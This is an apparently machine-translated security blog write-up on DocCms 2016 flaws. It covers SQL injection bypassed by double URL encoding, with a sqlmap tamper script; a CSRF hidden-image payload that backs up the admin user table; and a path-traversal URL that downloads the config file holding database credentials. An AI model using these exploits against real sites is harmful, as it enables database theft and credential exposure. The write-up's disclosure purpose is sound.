0 x01 preface
DocCms, positioning for enterprises, webmasters, developers, network companies, VI planning and design companies, SEO promotion and marketing companies, website beginners and other users tailored to create a new enterprise website, content management system, service in the enterprise brand information construction, but also to adapt to the use of personal, portal site construction!
0x02 Environment Setup
DocCms official website: www.doccms.com
Program source code: DocCms2016
Download it at pan.baidu.com/s/1pLclifL
0 x03 SQL injection
The code analysis
In/content/search/index. PHP, first of all parameters of the keyword is used to detect the illegal character,
CheckSqlStr = /inc/function.php
The checkSqlStr function performs a regular match on the string passed in to check for illegal characters.
Continue to look at/content/search/index get_search_result function in PHP:
Parameter keyword detects illegal characters, decodes URLS, and then splices them into SQL statements for execution.
If we pass double URL-encoded strings, illegal character detection will be bypassed, and then decoded by URldecode, brought into the database for execution, resulting in SQL injection vulnerability.
The exploit
Double URLencode encoding bypass, you can bypass URLencode double encoding by writing tamper, tamper script is as follows:
#! /usr/bin/env python import re from urllib import quote from lib.core.data import kb from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL def dependencies(): pass def tamper(payload, **kwargs): retVal = payload retVal = quote(quote(retVal)) return retValCopy the codeLoad the Tamper script using SQLMAP to obtain sensitive database data
0x04 CSRF
The code analysis
In \ doccms \ admini \ controllers \ system \ back PHP
The export function directly processes tables/sizelimit and exports the SQL backup file without verifying the access source. As a result, CSRF vulnerabilities exist in the database backup module.
The exploit
1, construct CSRF vulnerability exploit code, only backup administrator user table doc_user:
< H2 > CRSFTester < / H2 > < img SRC = "http://127.0.0.1:80/admini/index.php? M =system&s=bakup&a=export&tables[]=doc_user&sizelimit=2048&dosubmit= start backup data "width="0" height="0" border="0"/>Copy the code2. Submit CSRF vulnerability exploit code in online message on website home page:
3. When the administrator checks messages in the background, the database is automatically backed up to /doccms/temp/data:
0x05 Arbitrary file Download
The code analysis
In \ doccms \ admini \ controllers \ system \ back in PHP,
The download function simply judges the filename and then splices filename into the path for download, resulting in arbitrary file download vulnerabilities.
The exploit
1, to construct the url to download the global configuration file access to sensitive information: http://127.0.0.1/admini/index.php? m=system&s=bakup&a=download&filename=.. /.. /config/doc-config-cn.php
2. Obtain sensitive information such as database account password:
Unfinished, to be continued.
About me: A network security enthusiast, dedicated to sharing original high-quality dry goods, welcome to follow my personal wechat public account: Bypass–, browse more wonderful articles.
